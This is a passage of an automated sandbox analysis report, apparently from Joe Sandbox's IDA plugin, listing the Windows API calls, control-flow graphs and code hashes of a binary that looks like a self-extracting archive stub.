                                                  • Part of subcall function 00B20678: TranslateMessage.USER32(?), ref: 00B206BC
                                                  • Part of subcall function 00B20678: DispatchMessageW.USER32(?), ref: 00B206C6
                                                • GetDlgItem.USER32(00000068,00000000), ref: 00B23595
                                                • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,00B1FD20,00000001,?,?), ref: 00B235BA
                                                • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B235C9
                                                • SendMessageW.USER32(00000000,000000C2,00000000,00B3C6C8), ref: 00B235D7
                                                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B235F1
                                                • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00B2360B
                                                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B2364F
                                                • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00B23662
                                                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B23675
                                                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B2369C
                                                • SendMessageW.USER32(00000000,000000C2,00000000,00B3C860), ref: 00B236AB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                • String ID: \
                                                • API String ID: 3569833718-2967466578
                                                • Opcode ID: 33b01fee673ca37801bc96b710152a333d321c5a13737f1c4cea7d0165fa5997
                                                • Instruction ID: 56f0930f77adcb2b2c3d87a01515ed38e5e57f616f1eb7ef333ea178b0dfd83f
                                                • Opcode Fuzzy Hash: 33b01fee673ca37801bc96b710152a333d321c5a13737f1c4cea7d0165fa5997
                                                • Instruction Fuzzy Hash: 0D31C371289B00BFE3119F20EC49F6B7BECEB55702F0005D9FA55A71A1DFB499048BA6

                                                Control-flow Graph

                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B238A7
                                                • ShellExecuteExW.SHELL32(?), ref: 00B23AA4
                                                • IsWindowVisible.USER32(?), ref: 00B23ACF
                                                • ShowWindow.USER32(?,00000000), ref: 00B23ADD
                                                • WaitForInputIdle.USER32(?,000007D0), ref: 00B23AED
                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00B23B0F
                                                • CloseHandle.KERNEL32(?), ref: 00B23B33
                                                • ShowWindow.USER32(?,00000001), ref: 00B23B76
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Window$Show$CloseCodeExecuteExitH_prolog3_HandleIdleInputProcessShellVisibleWait
                                                • String ID: .exe$.inf
                                                • API String ID: 3208621885-3750412487
                                                • Opcode ID: 7244f64b9efb63d1cf8ad197058fb645f16b0b559b516735309049b61f772c67
                                                • Instruction ID: 7549710bc76546d1d539fec8b0630542ec149532f09642d06e1d882329aa72fa
                                                • Opcode Fuzzy Hash: 7244f64b9efb63d1cf8ad197058fb645f16b0b559b516735309049b61f772c67
                                                • Instruction Fuzzy Hash: D4B1C231A00368DFCB25DF64E8887ED77F5EF45B10F244199E849A7290DB78AE85CB50

                                                Control-flow Graph

                                                control_flow_graph 1052 b23efc-b23f11 call b257d8 1055 b23f13 1052->1055 1056 b23f15-b23f45 SetEnvironmentVariableW call b16366 1052->1056 1055->1056 1058 b23f4a-b23f4c 1056->1058 1059 b23f4e 1058->1059 1060 b23f8c-b23f92 1058->1060 1061 b23f51-b23f57 1059->1061 1062 b23fc7-b23fcc call b25787 1060->1062 1063 b23f94-b23fa9 1060->1063 1066 b23f5b-b23f67 call b16624 1061->1066 1067 b23f59 1061->1067 1064 b23fab-b23fbb call b019a9 1063->1064 1065 b23fbe-b23fc6 call b25726 1063->1065 1064->1065 1065->1062 1076 b23f72-b23f76 1066->1076 1077 b23f69-b23f70 1066->1077 1067->1066 1078 b23f7a-b23f86 SetEnvironmentVariableW 1076->1078 1079 b23f78 1076->1079 1077->1061 1078->1060 1079->1078
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B23F03
                                                • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?,?,?,?,?,?,00000028), ref: 00B23F1B
                                                • SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 00B23F86
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: EnvironmentVariable$H_prolog3_
                                                • String ID: sfxcmd$sfxpar
                                                • API String ID: 3605364767-3493335439
                                                • Opcode ID: 90a86d7f4d820e8045183537ba76a86168b3c57f79198dad3285c33a8a503825
                                                • Instruction ID: 4521593ae3589f891dbf2cc83740da31ffbc0150c990fc972697733d96c302b1
                                                • Opcode Fuzzy Hash: 90a86d7f4d820e8045183537ba76a86168b3c57f79198dad3285c33a8a503825
                                                • Instruction Fuzzy Hash: 9B21F670D11228DBCB14DFA8EA859EDB7F9EB48700F60445AF449F7250DB34AA45CB64

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00B16C5E: __EH_prolog3_GS.LIBCMT ref: 00B16C65
                                                  • Part of subcall function 00B16C5E: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00B16C9A
                                                • OleInitialize.OLE32(00000000), ref: 00B1F4ED
                                                • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B1F524
                                                • SHGetMalloc.SHELL32(00B5532C), ref: 00B1F52E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: DirectoryGdiplusH_prolog3_InitializeMallocStartupSystem
                                                • String ID: riched20.dll$3Ro
                                                • API String ID: 2446841611-3613677438
                                                • Opcode ID: 9abcf3389e2b1704ba2f62c6837cbbb6fa143cb5eb061474e46e0fdbd147e38f
                                                • Instruction ID: 45f5a4615603d37016fe85a59cd31bf80d95a800faf8f59c013127eeb784764c
                                                • Opcode Fuzzy Hash: 9abcf3389e2b1704ba2f62c6837cbbb6fa143cb5eb061474e46e0fdbd147e38f
                                                • Instruction Fuzzy Hash: B5F0FFB5D40209ABCB50AF99D849ADEFBFCEF94701F104096E415A2250DBB456458BA1

                                                Control-flow Graph

                                                control_flow_graph 1084 b0e180-b0e1c9 1085 b0e1d4 1084->1085 1086 b0e1cb-b0e1ce 1084->1086 1088 b0e1d6-b0e1e6 1085->1088 1086->1085 1087 b0e1d0-b0e1d2 1086->1087 1087->1088 1089 b0e1e8 1088->1089 1090 b0e1ee-b0e1f8 1088->1090 1089->1090 1091 b0e1fa 1090->1091 1092 b0e1fd-b0e22a 1090->1092 1091->1092 1093 b0e232-b0e238 1092->1093 1094 b0e22c 1092->1094 1095 b0e23a 1093->1095 1096 b0e23c-b0e254 CreateFileW 1093->1096 1094->1093 1095->1096 1097 b0e316 1096->1097 1098 b0e25a-b0e28a GetLastError call b1169a 1096->1098 1100 b0e319-b0e31c 1097->1100 1104 b0e28c-b0e293 1098->1104 1105 b0e2be 1098->1105 1102 b0e32a-b0e32e 1100->1102 1103 b0e31e-b0e321 1100->1103 1107 b0e330-b0e333 1102->1107 1108 b0e34f-b0e360 1102->1108 1103->1102 1106 b0e323 1103->1106 1109 b0e295 1104->1109 1110 b0e298-b0e2b8 CreateFileW GetLastError 1104->1110 1112 b0e2c1-b0e2cb 1105->1112 1106->1102 1107->1108 1111 b0e335-b0e34c SetFileTime 1107->1111 1113 b0e362-b0e370 call b025c3 1108->1113 1114 b0e374-b0e39a call b01a66 call b25734 1108->1114 1109->1110 1110->1105 1115 b0e2ba-b0e2bc 1110->1115 1111->1108 1116 b0e300-b0e314 1112->1116 1117 b0e2cd-b0e2e2 1112->1117 1113->1114 1115->1112 1116->1100 1120 b0e2e4-b0e2f4 call b019a9 1117->1120 1121 b0e2f7-b0e2ff call b25726 1117->1121 1120->1121 1121->1116
                                                APIs
                                                • CreateFileW.KERNELBASE(?,00000001,00000000,00000000,00000003,08000000,00000000,5EA84158,?,?,00000000,?,?,00000000,00B39E6B,000000FF), ref: 00B0E248
                                                • GetLastError.KERNEL32(?,?,00000000,00B39E6B,000000FF,?,00000011,?,?,00000000,?,?,?,?,?,?), ref: 00B0E25A
                                                • CreateFileW.KERNEL32(?,00000001,00000000,00000000,00000003,08000000,00000000,?,?,?,?,00000000,00B39E6B,000000FF,?,00000011), ref: 00B0E2A6
                                                • GetLastError.KERNEL32(?,?,00000000,00B39E6B,000000FF,?,00000011,?,?,00000000,?,?,?,?,?,?), ref: 00B0E2AF
                                                • SetFileTime.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,00B39E6B,000000FF,?,00000011,?,?,00000000,?,?), ref: 00B0E346
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: File$CreateErrorLast$Time
                                                • String ID:
                                                • API String ID: 1999340476-0
                                                • Opcode ID: cb94bd37e545a17de51d81d8764f2a3c2b3599236b206c8d93ab235246d54a58
                                                • Instruction ID: 4bbc6d6cb89287a053885ace658f543fd21c20651f72e47fbc2d8b6688a2aa98
                                                • Opcode Fuzzy Hash: cb94bd37e545a17de51d81d8764f2a3c2b3599236b206c8d93ab235246d54a58
                                                • Instruction Fuzzy Hash: 43617B71904249AFDB24CFA4D885BEE7FE4FB08314F204A6AF825A72D0D774E944CB94

                                                Control-flow Graph

                                                control_flow_graph 1130 b174ec-b17536 call b177cf ReleaseSemaphore 1133 b17556-b1758a DeleteCriticalSection CloseHandle * 2 1130->1133 1134 b17538 1130->1134 1135 b1753b-b17554 call b175ed CloseHandle 1134->1135 1135->1133
                                                APIs
                                                  • Part of subcall function 00B177CF: ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,00000004,00B073B8), ref: 00B177E1
                                                  • Part of subcall function 00B177CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00000004,00B073B8), ref: 00B177F5
                                                • ReleaseSemaphore.KERNEL32(?,00000040,00000000,5EA84158,?,?,00000001,00000000,00B3A603,000000FF,?,00B190B9,?,?,00B05630,?), ref: 00B1752A
                                                • CloseHandle.KERNELBASE(?,?,?,00B190B9,?,?,00B05630,?,?,?,00000000,?,?,?,00000001,?), ref: 00B17544
                                                • DeleteCriticalSection.KERNEL32(?,?,00B190B9,?,?,00B05630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00B1755D
                                                • CloseHandle.KERNEL32(?,?,00B190B9,?,?,00B05630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00B17569
                                                • CloseHandle.KERNEL32(?,?,00B190B9,?,?,00B05630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00B17575
                                                  • Part of subcall function 00B175ED: WaitForSingleObject.KERNEL32(?,000000FF,00B1770A,?,?,00B1777F,?,?,?,?,?,00B17769), ref: 00B175F3
                                                  • Part of subcall function 00B175ED: GetLastError.KERNEL32(?,?,00B1777F,?,?,?,?,?,00B17769), ref: 00B175FF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                • String ID:
                                                • API String ID: 1868215902-0
                                                • Opcode ID: 3e9db0d7f3ca7dc11f4f9d1bea916a329a0e3c18325b7b669679d28a559547c0
                                                • Instruction ID: 73a209f2ad77305a87bc78f98b3bb01a327ec95c5d355e4369c2653619369511
                                                • Opcode Fuzzy Hash: 3e9db0d7f3ca7dc11f4f9d1bea916a329a0e3c18325b7b669679d28a559547c0
                                                • Instruction Fuzzy Hash: 44118E76004744EFC7229FA4DC85BCAFBF9FB08710F504929E156A31A0CF71A9408B60

                                                Control-flow Graph

                                                control_flow_graph 1138 b20678-b20691 PeekMessageW 1139 b20693-b206a7 GetMessageW 1138->1139 1140 b206cc-b206ce 1138->1140 1141 b206b8-b206c6 TranslateMessage DispatchMessageW 1139->1141 1142 b206a9-b206b6 IsDialogMessageW 1139->1142 1141->1140 1142->1140 1142->1141
                                                APIs
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B20689
                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B2069A
                                                • IsDialogMessageW.USER32(00010460,?), ref: 00B206AE
                                                • TranslateMessage.USER32(?), ref: 00B206BC
                                                • DispatchMessageW.USER32(?), ref: 00B206C6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Message$DialogDispatchPeekTranslate
                                                • String ID:
                                                • API String ID: 1266772231-0
                                                • Opcode ID: 7b3fabce0379df4c4295b7a42e25cc06c06c0ec4c0d127f8dbb9cdfedc00fa02
                                                • Instruction ID: 7a9f10c5719d62b1f9b24f24109eccfcbe62c42ec1be48518032c1abafb85872
                                                • Opcode Fuzzy Hash: 7b3fabce0379df4c4295b7a42e25cc06c06c0ec4c0d127f8dbb9cdfedc00fa02
                                                • Instruction Fuzzy Hash: 51F0B271A0532AABDB20ABE1FC4CEDB7FECEE452527444455B50AD3051EE24D505C7B0

                                                Control-flow Graph

                                                control_flow_graph 1143 b22813-b22845 call b07673 1146 b22847 1143->1146 1147 b2284a-b22850 1143->1147 1146->1147 1148 b22856-b2285b 1147->1148 1149 b22abd 1147->1149 1150 b22860-b2286e 1148->1150 1151 b2285d 1148->1151 1152 b22abf-b22ac3 1149->1152 1155 b22870-b2287c 1150->1155 1156 b22896 1150->1156 1151->1150 1153 b22ac5-b22ac8 1152->1153 1154 b22ace-b22ad2 1152->1154 1157 b22af7 1153->1157 1158 b22aca-b22acc 1153->1158 1154->1157 1159 b22ad4-b22ad7 1154->1159 1155->1156 1160 b2287e 1155->1160 1161 b22899-b2289c 1156->1161 1170 b234ad-b234e9 call b058cb 1157->1170 1164 b22ada-b22af2 call b07673 call b238a0 1158->1164 1159->1157 1165 b22ad9 1159->1165 1166 b22884-b22888 1160->1166 1162 b228a2-b228a7 1161->1162 1163 b22ab7 1161->1163 1167 b228a9 1162->1167 1168 b228ac-b228d7 call b2acee call b01afc 1162->1168 1163->1149 1164->1157 1165->1164 1171 b229f0-b229f2 1166->1171 1172 b2288e-b22894 1166->1172 1167->1168 1168->1170 1182 b228dd-b228e1 1168->1182 1171->1156 1175 b229f8-b229fc 1171->1175 1172->1156 1172->1166 1175->1161 1183 b228e3 1182->1183 1184 b228e5-b228ec 1182->1184 1183->1184 1185 b228f1-b2292f call b0120c call b1645a 1184->1185 1186 b228ee 1184->1186 1191 b22935-b22937 1185->1191 1186->1185 1192 b22a01-b22a07 1191->1192 1193 b2293d-b2299f call b014a7 call b0adaa call b01a66 call b014a7 call b0adaa call b01a66 1191->1193 1195 b22a09-b22a24 1192->1195 1196 b22a4e-b22a68 1192->1196 1222 b229a1-b229a3 1193->1222 1223 b229a4-b229d2 call b014a7 call b0adaa call b01a66 1193->1223 1200 b22a26-b22a3f call b019a9 1195->1200 1201 b22a45-b22a4d call b25726 1195->1201 1198 b22a6a-b22a85 1196->1198 1199 b22aaf-b22ab5 1196->1199 1204 b22aa6-b22aae call b25726 1198->1204 1205 b22a87-b22aa0 call b019a9 1198->1205 1199->1152 1200->1201 1201->1196 1204->1199 1205->1204 1222->1223 1230 b229d7-b229eb call b1645a 1223->1230 1231 b229d4-b229d6 1223->1231 1230->1191 1231->1230
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: _wcslen
                                                • String ID: HIDE$MAX$MIN
                                                • API String ID: 176396367-2426493550
                                                • Opcode ID: 02cd1a1e28bffd06a57fc244c93c94844c36461a8d3954148ed7c19863613383
                                                • Instruction ID: de1953efcf1db7fa8374997e5551dec1e12edd108520cbaa05beec3e750fdf0a
                                                • Opcode Fuzzy Hash: 02cd1a1e28bffd06a57fc244c93c94844c36461a8d3954148ed7c19863613383
                                                • Instruction Fuzzy Hash: 1FA17C72C00268DECF25DBA4DC85ADDBBF9BF49314F1405DAE809F7281DA359A89CB50

                                                Control-flow Graph

                                                control_flow_graph 1234 b1f2ce-b1f2f7 GetClassNameW 1235 b1f2f9-b1f30e call b18da4 1234->1235 1236 b1f31f-b1f321 1234->1236 1242 b1f310-b1f31c FindWindowExW 1235->1242 1243 b1f31e 1235->1243 1237 b1f323-b1f326 SHAutoComplete 1236->1237 1238 b1f32c-b1f338 call b25734 1236->1238 1237->1238 1242->1243 1243->1236
                                                APIs
                                                • GetClassNameW.USER32(?,?,00000050), ref: 00B1F2EF
                                                • SHAutoComplete.SHLWAPI(?,00000010), ref: 00B1F326
                                                  • Part of subcall function 00B18DA4: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00B10E3F,?,?,?,00000046,00B11ECE,00000046,?,exe,00000046), ref: 00B18DBA
                                                • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00B1F316
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                • String ID: EDIT
                                                • API String ID: 4243998846-3080729518
                                                • Opcode ID: cea28203f2dfbce7b0f35ba3935967a3d4709a6ee081a038add3980aaa474608
                                                • Instruction ID: 6be045183fcfed13e7da8502fe05ac3fa94a76de5f031fa4c6aed8c21918d9ec
                                                • Opcode Fuzzy Hash: cea28203f2dfbce7b0f35ba3935967a3d4709a6ee081a038add3980aaa474608
                                                • Instruction Fuzzy Hash: 90F0A431701219ABDB209B24AD05FEF77ECDF45B10F4400A5BA00E71D0DE70AE45C6A9

                                                Control-flow Graph

                                                control_flow_graph 1245 b0e948-b0e961 call b257d8 1248 b0e963-b0e965 1245->1248 1249 b0e96a-b0e974 1245->1249 1250 b0eaa6-b0eaab call b25787 1248->1250 1251 b0e976-b0e983 GetStdHandle 1249->1251 1252 b0e988 1249->1252 1254 b0ea6f-b0ea72 1251->1254 1255 b0e98b-b0e998 1252->1255 1254->1255 1256 b0e99a-b0e99e 1255->1256 1257 b0e9df-b0e9f4 WriteFile 1255->1257 1259 b0e9a0-b0e9ab 1256->1259 1260 b0e9ff-b0ea03 1256->1260 1261 b0e9f7-b0e9f9 1257->1261 1262 b0e9ad 1259->1262 1263 b0e9af-b0e9ce WriteFile 1259->1263 1264 b0ea9f-b0eaa2 1260->1264 1265 b0ea09-b0ea0d 1260->1265 1261->1260 1261->1264 1262->1263 1263->1261 1266 b0e9d0-b0e9db 1263->1266 1264->1250 1265->1264 1267 b0ea13-b0ea25 call b09230 1265->1267 1266->1259 1268 b0e9dd 1266->1268 1271 b0ea77-b0ea9a call b014a7 call b09653 call b01a66 1267->1271 1272 b0ea27-b0ea30 1267->1272 1268->1261 1271->1264 1272->1255 1274 b0ea36-b0ea3a 1272->1274 1274->1255 1276 b0ea40-b0ea6c 1274->1276 1276->1254
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B0E94F
                                                • GetStdHandle.KERNEL32(000000F5,0000002C,00B12D28,?,?,?,?,00000000,00B1ABB6,?,?,?,?,?,00B1A80E,?), ref: 00B0E978
                                                • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B0E9BE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: FileH_prolog3_HandleWrite
                                                • String ID:
                                                • API String ID: 2898186245-0

                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B0EFF6
                                                • CreateDirectoryW.KERNELBASE(?,00000000,?,00000024,00B0EBA7,?,00000001,00000000,?,?,00000024,00B0A4DE,?,00000001,?,?), ref: 00B0F01F
                                                • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,00000024,00B0EBA7,?,00000001,00000000,?,?,00000024,00B0A4DE,?), ref: 00B0F075
                                                • GetLastError.KERNEL32(?,?,00000024,00B0EBA7,?,00000001,00000000,?,?,00000024,00B0A4DE,?,00000001,?,?,00000000), ref: 00B0F0E3
                                                Similarity
                                                • API ID: CreateDirectory$ErrorH_prolog3_Last
                                                • String ID:
                                                • API String ID: 3709856315-0
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F6,?,?,?,00000000,00B0E5D2,?,?,00000000,?,00000000), ref: 00B0E029
                                                • ReadFile.KERNELBASE(?,?,00000000,00100000,00000000,?,?,?,00000000,00B0E5D2,?,?,00000000,?,00000000), ref: 00B0E041
                                                • GetLastError.KERNEL32(?,?,?,00000000,00B0E5D2,?,?,00000000,?,00000000), ref: 00B0E073
                                                • GetLastError.KERNEL32(?,?,?,00000000,00B0E5D2,?,?,00000000,?,00000000), ref: 00B0E092
                                                Similarity
                                                • API ID: ErrorLast$FileHandleRead
                                                • String ID:
                                                • API String ID: 2244327787-0
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00010000,Function_00017760,?,00000000,?), ref: 00B1764C
                                                • SetThreadPriority.KERNEL32(?,00000000,?,?,?,?,00000004,00B0736D,00B05AB0,?), ref: 00B17693
                                                  • Part of subcall function 00B092EB: __EH_prolog3_GS.LIBCMT ref: 00B092F2
                                                  • Part of subcall function 00B09500: __EH_prolog3_GS.LIBCMT ref: 00B09507
                                                Strings
                                                Similarity
                                                • API ID: H_prolog3_Thread$CreatePriority
                                                • String ID: CreateThread failed
                                                • API String ID: 3138599208-3849766595
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B0DEA1
                                                • CreateFileW.KERNELBASE(?,?,?,00000000,00000002,00000000,00000000,?,00000024,00B0E8F5,?,?,00B0A6B9,?,00000011,?), ref: 00B0DF15
                                                • CreateFileW.KERNEL32(?,?,?,00000000,00000002,00000000,00000000,?,?,?,00B0D303,?,?,?), ref: 00B0DF65
                                                Similarity
                                                • API ID: CreateFile$H_prolog3_
                                                • String ID:
                                                • API String ID: 1771569470-0
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B16C65
                                                • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00B16C9A
                                                • LoadLibraryW.KERNELBASE(00000000,?,?,00000000,00000000,?), ref: 00B16D0C
                                                Similarity
                                                • API ID: DirectoryH_prolog3_LibraryLoadSystem
                                                • String ID:
                                                • API String ID: 1552931673-0
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B0F592
                                                • SetFileAttributesW.KERNELBASE(?,?,00000024,00B0A724,?,?,?,00000011,?,?,00000000,?,?,?,?,?), ref: 00B0F5A8
                                                • SetFileAttributesW.KERNEL32(?,?,?,?,?,00B0D303,?,?,?,?,?,?,?,5EA84158,00000049), ref: 00B0F5EB
                                                Similarity
                                                • API ID: AttributesFile$H_prolog3_
                                                • String ID:
                                                • API String ID: 2559025557-0
                                                APIs
